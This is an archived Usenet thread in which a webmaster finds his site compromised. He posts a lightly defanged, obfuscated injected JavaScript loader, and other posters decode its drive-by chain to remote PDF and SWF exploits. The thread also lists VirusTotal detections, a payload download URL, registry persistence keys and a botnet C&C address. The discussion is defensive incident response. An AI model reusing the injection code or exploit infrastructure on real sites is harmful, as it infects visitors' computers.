A website I manage seems to have a problem when I tried to access it
today with Chrome browser.
Chrome gives the following warning:
"Warning: Visiting this site may harm your computer!
The website at www.XXXX.YYY (I am not giving the actual URL) contains
elements from the site beebest.cn, which appears to host malware –
software that can hurt your computer or otherwise operate without your
consent. Just visiting a site that contains malware can infect your
computer.
For detailed information about the problems with these elements, visit
the Google Safe Browsing diagnostic page for beebest.cn.
Learn more about how to protect yourself from harmful software online.
I understand that visiting this site may harm my computer. "
How can "elements" from beebest.cn can be on this site? What "do"
elements mean in this case?
I am downloading the site and will do a text search for "beebest" .
Any other recommendations?
Thanks
Deguza
I just had a friend try to access my website. He got the same message
except the beebest.cn was replaced by www.corpamata.cn.
What is going on?
Deguza
Dunno, but if it were my site I'd be looking to sack the webmaster
because he doesn't seem to know what he's doing.
Post the frigging site and you might get a descent answer from someone
who bothers to go and look at the code.
>
> Deguza
>
These guys are complaining about the same thing. However, some are
finding no problems...
http://www.greenockmorton.org/forum/index.php?showtopic=26972
Deguza
Hello Deguza:
I too believe we should be dealing with specifics. Please reply with
your site's true and complete URL in the form of:
<hxxp://www.xxxx.yyy/>
^^
In the meantime, you may wish to see if your application software is
updated to the latest possible versions so as to have all possible
security holes plugged. If you also manage the website's OS please post
a great deal of detail on its state of revision. It wouldn't hurt to
give us the ISP so we don't have to dig for it. Do you also maintain
its hardware?
Warm regards,
Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]
> (I am not giving the actual URL)
Don't expect any help then.
--
<snip>
Does it use SQL queries. If so, likely malware was inserted via SQL
injection
No, it does not use SQL queries.
I found this in one of the pages. I have not put this in there, unless
FrontPage, or the webhosting software put it in.
Or it could be the infection (I am putting "-"s in some of the key
words just in case it tries to execute on a the web...):
<s-c-ript la-ngu-age=ja-va-script><!--
do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
%2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
%3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
ii/g,""));
--></script><body>
I did not want anybody getting infected, that's why I did not give it
out.
Deguza
> These guys are complaining about the same thing. However, some are
> finding no problems...
>
> http://www.greenockmorton.org/forum/index.php?showtopic=26972
PHP forums ...
I lack the time to go there and triage it, but PHP is quite a
playground, and forums even more so. Probably some sort of script
injection attack if not a complete compromise.
--
Todd H.
http://www.toddh.net/
No, it does not use SQL queries.
What method do you use to upload content (ftp, and web admin page via http)?
What web server is in use?
The first is subject to password attack, the latter to application
vulnerabilities.
> I am downloading the site and will do a text search for "beebest" .
>
> Any other recommendations?
>
Do you have any dynamic content?
Do you run banner ads that are not on your machine but are links to another
machine?
Do you include google keyword advertising?
Do you have a link to a webring at the bottom of the webpage?
Gandalf Parker
Yes !
The web site was compramised.
A decode of the above brings one to; 94.247.x.y/jquery.js
Which in turn brings you to...
94.247.x.y/news/?id=2 ( pdf exploit )
94.247.x.y/news/?id=3 ( swf exploit )
--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
I don't think he's interested in how the malware works, rather how it got
onto his web site in the first place. His lack of technical information is
limiting the responses to 'commmon attack vectors' - we cannot provide a
definative method by which this was done without further details of the
host, how the content is updated, the o/s, web server, and apps running on
it.....
The subject of the post sounds like a query of if it was compramised.
If the code snippet provided was off the un-named web site. We can say... Yes, it is.
The OP indicated the reason for not providing the web site was "I did not want anybody
getting infected, that's why I did not give it
out." However, it could be posted obfuscated just like he did the code-snippet.
UPDATE:
* I found also a My hosting services told me that an infection on my
personal computer is probably where the injection of suspect codes
have started. He says the virus on my computer used the ftp link I
have to the web hosting site.
* In addition to the script I gave earlier, I found on some pages
another piece of code that had an "iframe" html command. The iframe
was referring to a chinese site "betwager". I am not able to write the
full code and the site. Google won't let me post it.
| UPDATE:
Don't use Google !
news://nntp.aioe.org/alt.computer.security
Crosss-Posted to the other groups.
As for your hosting company, they could be wrong are just passing the blame to you.
Chances are MORE likely that you use an application on the server with vulnerabilities and
malicious actors have exploited them to add malicious code to your site.
It seems like I need to install a newsreader on my computer to use the
"news://nntp.aioe.org/alt.computer.security ".
Outlooked volunteered when I put that in my Chrome's address area, but
I do not want to use it.
Any recommendations for a news reader for the XP environment? If it
matters, I use Firefox in addition to chrome.
Deguza
> From: "Kompu Kid" <deg...@hotmail.com>
>
>
>
> | UPDATE:
>
> | * I found also a My hosting services told me that an infection on my
> | personal computer is probably where the injection of suspect codes
> | have started. He says the virus on my computer used the ftp link I
> | have to the web hosting site.
>
> | * In addition to the script I gave earlier, I found on some pages
> | another piece of code that had an "iframe" html command. The iframe
> | was referring to a chinese site "betwager". I am not able to write the
> | full code and the site. Google won't let me post it.
> Crosss-Posted to the other groups.
>
> As for your hosting company, they could be wrong are just passing the blame to you.
> Chances are MORE likely that you use an application on the server with vulnerabilities and
> malicious actors have exploited them to add malicious code to your site.
Much agreed. PHP is so pourous that it's much more likely to be a
direct attack on your site rather than some convoluted "trojan on your
computer that modifies local html and then magically knows what FTP
client you're using, reuses its cached password for the site and loads
the modified html onto the remote site."
The target audience for such a client side sploit is so small it
wouldn't be worthwhile.
visit http://www.securityfocus.com/vulnerabilities
and for each of the following, chase down what vulns there are for it
for the version of each your site is running
Web server version (apache whatever likely)
php version on the server
what php forum script you're using / version
And see what vulns are in each for the versions you have, and that'll
wittle down the "how" in what happened perhaps.
| It seems like I need to install a newsreader on my computer to use the
| "news://nntp.aioe.org/alt.computer.security ".
| Outlooked volunteered when I put that in my Chrome's address area, but
| I do not want to use it.
| Any recommendations for a news reader for the XP environment? If it
| matters, I use Firefox in addition to chrome.
| Deguza
Mozilla Thunderbird - http://www.mozillamessaging.com/en-US/thunderbird/
MicroPlanet Gravity - http://mpgravity.sourceforge.net/
> * I found also a My hosting services told me that an infection on my
> personal computer is probably where the injection of suspect codes
> have started. He says the virus on my computer used the ftp link I
> have to the web hosting site.
LOL
--
A fireside chat not with Ari!
http://tr.im/holj
Motto: Live To Spooge It!
Can you/will you expand on your comment, ©Ari® ?
Thanks
If you're posting a message in a hacker forum with a warning that you
think the site might be compromised, then the people who look at it are
forewarned.
Not posting the URL is stupid. People who can do low-tech stuff like
telnet to the server and download the page for analysis can't do that if
they don't know where it is.
It's like telling someone you think you have an STD, but not going to the
doctor to really find out.
Doc.
--
The bigger the humbug, the better people will like it.
- Phineas Taylor Barnum.
<snip>
> Any recommendations for a news reader for the XP environment? If it
> matters, I use Firefox in addition to chrome.
I still like X-News.
http://download.cnet.com/Xnews/3000-2164_4-10026377.html
Really should download and try the latest version, but the one I have just
works - no attempts to execute code or render pages, so very safe.
"DGB" <DGBi...@al.com> wrote in message news:gsrpc3$d8e$1...@aioe.org...
Can you/will you expand on your comment, ŠAriŽ ?
Thanks
<snip>
> How can "elements" from beebest.cn can be on this site? What "do"
> elements mean in this case?
usually cross-site scripting and/or embedded objects (IFRAME, etc.).
Descriptions of what those terms mean are worth a google if you don't
already have a good understanding of why it's a problem.
> On Apr 22, 9:22 am, John Holmes <nospam.13i...@gmail.com> wrote:
>> Kompu Kid "contributed" in alt.hacker:
>>
>> > (I am not giving the actual URL)
>>
>> Don't expect any help then.
>>
>> --
>> <snip>
>
> I did not want anybody getting infected, that's why I did not give it
> out.
>
> Deguza
I'll second Doc.
Most of the regulars here know what they're doing. FYI, my system will
not get infected by just browsing to a compromised website.
--
<snip>
> I'll second Doc.
>
> Most of the regulars here know what they're doing. FYI, my system will
> not get infected by just browsing to a compromised website.
>
Hello John :)
Please will you explain how/why *your* system will not be so infected
yet other folk may be?
Might it simply be because you aren't using Microsoft Windows?
--
Dave
As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
2008 DC's running ISA server and Forefront. That setup keeps my local
network free of mal/spy-ware, viruses and other nasties. The servers are
really in use as servers, i.e. nobody touches them but me and no websites
are ever visited on them.
I hope my answer satisfied you.
--
<snip>
Thank you for your response, John
With every post, I learn more. I had never heard of 'Slackware' before,
but have now visited http://www.slackware.com/index.html and now know!
I'm well outside my comfort zone but did look here, too:-
http://www.petri.co.il/rename-windows-server-2008-domain-controllers.htm
I also note that "Vulnerabilities in Microsoft ISA Server and Forefront
Threat Management Gateway (Medium Business Edition) Could Cause Denial
of Service (961759)" Ref:
http://www.microsoft.com/technet/security/bulletin/ms09-016.mspx
With equipment as described you are obviously not a simple hobbyist like
me. I'm delighted to learn that *you* cannot be infected simply by
visiting a specific URL like millions of folk in my position. It must
give you a real sense of superiority! ;)
--
Dave
Would you be surprised that I'm aware of that and my servers have been
patched and therefore not vurnerable to those attacks?
>
> With equipment as described you are obviously not a simple hobbyist
> like me. I'm delighted to learn that *you* cannot be infected simply
> by visiting a specific URL like millions of folk in my position. It
> must give you a real sense of superiority! ;)
It doesn't. There must be thousands of guys (or even girls) around
knowing more than I do.
;-)
>
> --
> Dave
>
--
<snip>
> ~BD~ "contributed" in alt.hacker:
>
>> John Holmes wrote:
>>
>>> I'll second Doc.
>>>
>>> Most of the regulars here know what they're doing. FYI, my system will
>>> not get infected by just browsing to a compromised website.
>>>
>>
>> Hello John :)
>>
>> Please will you explain how/why *your* system will not be so infected
>> yet other folk may be?
>>
>> Might it simply be because you aren't using Microsoft Windows?
>>
>> --
>> Dave
>>
>
> As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
> and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
> 2008 DC's running ISA server and Forefront. That setup keeps my local
> network free of mal/spy-ware, viruses and other nasties.
As far as you know.
Proving a negative is very difficult.
Of course you were vulnerable. The bug existed since day 1 of the o/s
release. It's been exploitable since then. The fact you have now patched it
only shows you have closed the door after the horse has bolted.
Exactly.
Hence why I pointed out using an unusual, but old, tool like telnet to
download page content. It will never execute any content in the page, and
you have to read the page content and explicitly request copies of
ancilliary pages. No danger. Relying on any sort of 'malware firewall'
leaves you open to something zero-day.
No, not at all! I'd have been surprised and concerned if you had *not*
already applied that patch. I used same simply as an example to show you
that I had investigated (just a little bit!) why you felt so very safe!
You have, of course, considered that your equipment may have been
compromised *before* you applied said patch? ;)
>
>> With equipment as described you are obviously not a simple hobbyist
>> like me. I'm delighted to learn that *you* cannot be infected simply
>> by visiting a specific URL like millions of folk in my position. It
>> must give you a real sense of superiority! ;)
>
> It doesn't.
That's good!
There must be thousands of guys (or even girls) around knowing more than
I do.
Oh yes - I'm sure there are!
(but unfortunately, many of them will be the 'bad guys'!)
I have often heard comments such as this about PHP - yet, aside from the
.asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
using PHP to run the back-ends? I guess what I'm asking - if you're
scripting the back end to some website, and security is a main concern,
which language would you recommend?
Cheers.
The language matters much less than the quality of the programmer. If
you have a high-quality programmer, go with the language that person
recommends.
Having been programming in many languages for over 35 years, I have
yet to see a language that can keep a programmer from doing a bad job.
Craig
> Yet another name for a boy chasing insecure BoaterDave.
>
> "DGB" <DGBi...@al.com> wrote in message news:gsrpc3$d8e$1...@aioe.org...
> �Ari� wrote:
>> On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:
>>
>>> * I found also a My hosting services told me that an infection on my
>>> personal computer is probably where the injection of suspect codes
>>> have started. He says the virus on my computer used the ftp link I
>>> have to the web hosting site.
>>
>> LOL
>
> Can you/will you expand on your comment, �Ari� ?
>
> Thanks
To which one of you nym-shifters?
> I guess what I'm asking - if you're
> scripting the back end to some website, and security is a main concern,
> which language would you recommend?
Either use a language that is unlikely to be used by crackers,
or be an expert at the most popular languages in use,
or higher an expert at the most popular languages in use,
or pay for all your code from someone you can sue.
Gandalf Parker
--
A popular package might mean its good but it doesnt mean its secure.
In fact, quite the opposite.
> I have often heard comments such as this about PHP - yet, aside from the
> .asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
> using PHP to run the back-ends? I guess what I'm asking - if you're
> scripting the back end to some website, and security is a main concern,
> which language would you recommend?
I'd recommend that a) you get a real education in what you are doing or
b) hire someone who has one.
Problem is, you won't know who to hire so get the education.
What would you consider a "real" education?
Cheers.
>| I found this in one of the pages. I have not put this in there, unless
>| FrontPage, or the webhosting software put it in.
>
>| Or it could be the infection (I am putting "-"s in some of the key
>| words just in case it tries to execute on a the web...):
>
>| <s-c-ript la-ngu-age=ja-va-script><!--
>.........etc
>Yes !
>The web site was compramised.
>A decode of the above brings one to; 94.247.x.y/jquery.js
>Which in turn brings you to...
>94.247.x.y/news/?id=2 ( pdf exploit )
>94.247.x.y/news/?id=3 ( swf exploit )
Hello,
I just received today an e-mail with an image from a compromised
system in Spain that links to a page in Florida, which in turns
redirects to a chinese web page that contains a PDF and a SWF file.
Have these two already received a name/warning/descritpion?? I am
waiting for a reply from ScanTotal.
I am trying to warn the domain owners in Spain and Florida of their
problem.
Thank you.
Geo
Snip, snip...
> Hello,
>
> I just received today an e-mail with an image from a compromised
> system in Spain that links to a page in Florida, which in turns
> redirects to a Chinese web page that contains a PDF and a SWF file.
> Have these two already received a name/warning/description?? I am
> waiting for a reply from ScanTotal.
>
> I am trying to warn the domain owners in Spain and Florida of their
> problem.
>
> Thank you.
>
> Geo
Hello Geo:
Although you should have originated your own separate thread, please
reply with an obfuscated but decipherable URL, and it probably will be
investigated as quickly.
HTH
Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]
>>| <s-c-ript la-ngu-age=ja-va-script><!--
>>.........etc
| Hello,
| Thank you.
| Geo
What is "ScanTotal" ?
Do you mean Virus Total ?
>|... I am
>| waiting for a reply from ScanTotal.
>What is "ScanTotal" ?
>Do you mean Virus Total ?
Yes, sorry. I guess I was kind of sleepy.
It looks as if Telus -my actual ISP- is blocking my messages to
VirusTotal, I'll have to find a way around to submit them, because I
receive no messages from Telus.
Geo
>> I just received today an e-mail with an image from a compromised
>> system in Spain that links to a page in Florida, which in turns
>> redirects to a Chinese web page that contains a PDF and a SWF file.
>> Have these two already received a name/warning/description?? I am
>> waiting for a reply from ScanTotal.
>Hello Geo:
>Although you should have originated your own separate thread, please
>reply with an obfuscated but decipherable URL, and it probably will be
>investigated as quickly.
Hi Pete,
I made a long distance call to leave them a message yesterday, as
they had already closed. The page remains there this morning at ww
millerconstruction dot com ( hidden I-frame?)
Thank you.
George
After I got around Telus:
Complete scanning result of "flash.swf", processed in VirusTotal at
04/30/2009
[ scan result ]
a-squared 4.0.0.101/20090430 found nothing
AhnLab-V3 5.0.0.2/20090430 found nothing
AntiVir 7.9.0.156/20090430 found [SWF/Drop.Small.QH]
Antiy-AVL 2.0.3.1/20090430 found nothing
Authentium 5.1.2.4/20090430 found nothing
Avast 4.8.1335.0/20090429 found nothing
AVG 8.5.0.327/20090430 found nothing
BitDefender 7.2/20090430 found nothing
CAT-QuickHeal 10.00/20090430 found nothing
ClamAV 0.94.1/20090430 found nothing
Comodo 1141/20090429 found nothing
DrWeb 4.44.0.09170/20090430 found nothing
eSafe 7.0.17.0/20090427 found nothing
eTrust-Vet 31.6.6484/20090430 found nothing
F-Prot 4.4.4.56/20090429 found nothing
F-Secure 8.0.14470.0/20090430 found [Trojan-Downloader:SWF/Swif.C]
Fortinet 3.117.0.0/20090430 found nothing
GData 19/20090430 found nothing
Ikarus T3.1.1.49.0/20090430 found nothing
K7AntiVirus 7.10.719/20090429 found nothing
Kaspersky 7.0.0.125/20090430 found nothing
McAfee 5600/20090429 found nothing
McAfee+Artemis 5600/20090429 found nothing
McAfee-GW-Edition 6.7.6/20090430 found [SWF.Drop.Small.QH]
Microsoft 1.4602/20090430 found [TrojanDownloader:Win32/Swif.gen!A]
NOD32 4046/20090430 found nothing
Norman 6.01.05/20090430 found nothing
nProtect 2009.1.8.0/20090429 found nothing
Panda 10.0.0.14/20090430 found nothing
PCTools 4.4.2.0/20090430 found nothing
Prevx1 3.0/20090430 found nothing
Rising 21.27.31.00/20090430 found nothing
Sophos 4.41.0/20090430 found [Troj/SWFExp-J]
Sunbelt 3.2.1858.2/20090429 found nothing
Symantec 1.4.4.12/20090430 found [Downloader.Swif.C]
TheHacker 6.3.4.1.317/20090429 found nothing
TrendMicro 8.950.0.1092/20090430 found nothing
VBA32 3.12.10.4/20090430 found nothing
ViRobot 2009.4.30.1716/20090430 found nothing
VirusBuster 4.6.5.0/20090429 found nothing
Complete scanning result of "readme.pdf", processed in VirusTotal at
04/30/2009
[ scan result ]
a-squared 4.0.0.101/20090430 found nothing
AhnLab-V3 5.0.0.2/20090430 found nothing
AntiVir 7.9.0.156/20090430 found nothing
Antiy-AVL 2.0.3.1/20090430 found nothing
Authentium 5.1.2.4/20090430 found nothing
Avast 4.8.1335.0/20090429 found [JS:Pdfka-FF]
AVG 8.5.0.327/20090430 found nothing
BitDefender 7.2/20090430 found nothing
CAT-QuickHeal 10.00/20090430 found nothing
ClamAV 0.94.1/20090430 found nothing
Comodo 1141/20090429 found nothing
DrWeb 4.44.0.09170/20090430 found nothing
eSafe 7.0.17.0/20090427 found nothing
eTrust-Vet 31.6.6484/20090430 found nothing
F-Prot 4.4.4.56/20090429 found nothing
F-Secure 8.0.14470.0/20090430 found nothing
Fortinet 3.117.0.0/20090430 found nothing
GData 19/20090430 found [JS:Pdfka-FF ]
Ikarus T3.1.1.49.0/20090430 found nothing
K7AntiVirus 7.10.719/20090429 found nothing
Kaspersky 7.0.0.125/20090430 found nothing
McAfee 5600/20090429 found nothing
McAfee+Artemis 5600/20090429 found nothing
McAfee-GW-Edition 6.7.6/20090430 found nothing
Microsoft 1.4602/20090430 found
[Exploit:Win32/Pdfjsc.gen!A]
NOD32 4046/20090430 found nothing
Norman 6.01.05/20090430 found nothing
nProtect 2009.1.8.0/20090429 found nothing
Panda 10.0.0.14/20090430 found nothing
PCTools 4.4.2.0/20090430 found nothing
Prevx1 3.0/20090430 found nothing
Rising 21.27.31.00/20090430 found nothing
Sophos 4.41.0/20090430 found nothing
Sunbelt 3.2.1858.2/20090429 found [Exploit.PDF-JS.Gen (v)]
Symantec 1.4.4.12/20090430 found [Trojan.Pidief.D]
TheHacker 6.3.4.1.317/20090429 found nothing
TrendMicro 8.950.0.1092/20090430 found nothing
VBA32 3.12.10.4/20090430 found nothing
ViRobot 2009.4.30.1716/20090430 found nothing
VirusBuster 4.6.5.0/20090429 found nothing
.... Found nothing???
Thanks.
George
| Geo
What messages ?
Are you sending samples via email ?
If yes then your email server may have anti virus software that will catch and block it
from being submitted to Virus Total (VT).
Otherwise submit the samples via... http://www.virustotal.com/
and check the box "send it over SSL"
| After I got around Telus:
| Complete scanning result of "flash.swf", processed in VirusTotal at
| 04/30/2009
| AntiVir 7.9.0.156/20090430 found [SWF/Drop.Small.QH]
| F-Secure 8.0.14470.0/20090430 found [Trojan-Downloader:SWF/Swif.C]
| McAfee-GW-Edition 6.7.6/20090430 found [SWF.Drop.Small.QH]
| Microsoft 1.4602/20090430 found [TrojanDownloader:Win32/Swif.gen!A]
| Sophos 4.41.0/20090430 found [Troj/SWFExp-J]
| Symantec 1.4.4.12/20090430 found [Downloader.Swif.C]
| Complete scanning result of "readme.pdf", processed in VirusTotal at
| 04/30/2009
| Avast 4.8.1335.0/20090429 found [JS:Pdfka-FF]
| GData 19/20090430 found [JS:Pdfka-FF ]
| Microsoft 1.4602/20090430 found [Exploit:Win32/Pdfjsc.gen!A]
| Sunbelt 3.2.1858.2/20090429 found [Exploit.PDF-JS.Gen (v)]
| Symantec 1.4.4.12/20090430 found [Trojan.Pidief.D]
|
| .... Found nothing???
| Thanks.
| George
Thanx George:
Please upload those files to; http://www.uploadmalware.com/
When you upload them, mention this thread, the web site hosting the exploits code, etc.,
and my request to upload them.
>
>Please upload those files to; http://www.uploadmalware.com/
>When you upload them, mention this thread, the web site hosting the exploits code, etc.,
>and my request to upload them.
Hi David,
Uploaded succesfully. Hopefully I wrote a clear explanation to go
with the files.
The files did finally go through my ISP and I got a reply like the
one I posted early, so the Telus anti-virus did not detect them. They
weren't detected either by the a-virus from my other e-mail address,
which has a very good a-virus.
The IT manager of the web page that was being used as a re-director
using a hidden Iframe did move quickly and has been moved the page to
a different host, and the hidden Iframe has been removed.
Thank you.
George
| Hi David,
| Uploaded succesfully. Hopefully I wrote a clear explanation to go
| with the files.
| The files did finally go through my ISP and I got a reply like the
| one I posted early, so the Telus anti-virus did not detect them. They
| weren't detected either by the a-virus from my other e-mail address,
| which has a very good a-virus.
| The IT manager of the web page that was being used as a re-director
| using a hidden Iframe did move quickly and has been moved the page to
| a different host, and the hidden Iframe has been removed.
| Thank you.
| George
Got'em thanx.
The payload of the PDF exploit (Luckysploit ?) is
lieliteautobody.cn load.php?id=8
http://www.virustotal.com/analisis/937814e3b10e2f9e312ab2bd91cc386f
a-squared 4.0.0.101 2009.05.01 Trojan-Dropper!IK
AntiVir 7.9.0.160 2009.04.30 TR/Dropper.Gen
DrWeb 4.44.0.09170 2009.05.01 Trojan.Botnetlog.3
eSafe 7.0.17.0 2009.04.30 Win32.TRDropper
Ikarus T3.1.1.49.0 2009.05.01 Trojan-Dropper
McAfee+Artemis 5601 2009.04.30 Artemis!418915B3DA44
McAfee-GW-Edition 6.7.6 2009.04.30 Trojan.Dropper.Gen
Microsoft 1.4602 2009.04.30 Trojan:Win32/Gearclop.gen!A
NOD32 4047 2009.04.30 Win32/TrojanDownloader.Bredolab.AA
Panda 10.0.0.14 2009.04.30 Suspicious file
Prevx1 3.0 2009.05.01 Medium Risk Malware
Sophos 4.41.0 2009.05.01 Mal/UnkPack-Fam
Sunbelt 3.2.1858.2 2009.05.01 Trojan-Win32/Gearclop.gen!A
Creates file:
%System%\digiwet.dll
Which is added to the Security Providers
HKLM\SYSTEM\ControlSet001\Control\SecurityProviders
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
SecurityProviders = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"
It looks like it gets its Bot C&C from; 78.109.29.112
It's like getting laid, you'll know it when you get some.
So....
You're still not getting any are you? LOL
I'm not surprised
The only thing Franklin J. Camper (alias "Ari") is getting is slapped
around everywhere he goes on Usenet, which is what he deserves.
--
"The chosen course of action, and the duration necessary is of no
consequence."
Wait...how did you know "Ari" was "Franklin J. Camper"!?? :)
Because I said so.
lol